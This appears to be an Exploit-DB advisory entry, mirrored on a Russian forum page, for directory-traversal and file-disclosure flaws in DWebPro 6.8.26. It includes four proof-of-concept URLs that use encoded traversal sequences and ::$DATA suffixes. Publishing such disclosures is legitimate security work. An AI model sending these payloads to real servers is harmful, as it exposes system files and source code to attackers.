- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32957
- Проверка EDB
-
- Пройдено
- Автор
- ALFONS LUJA
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2009-04-27
Код:
source: https://www.securityfocus.com/bid/34721/info
DWebPro is prone to a directory-traversal vulnerability and a vulnerability that allows attackers to view arbitrary files.
An attacker can exploit these issues to obtain sensitive information that may lead to other attacks.
DWebPro 6.8.26 is vulnerable; other versions may also be affected.
http://www.example.com:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
http://www.example.com:8080/..%2f..%2f..%2fWINDOWS%2f
http://www.example.com:8080/..\/www/500-100-js.asp::$DATA
http://www.example.com:8080/demos/aspclassic/asp_registry.asp::$DATA- Источник
- www.exploit-db.com
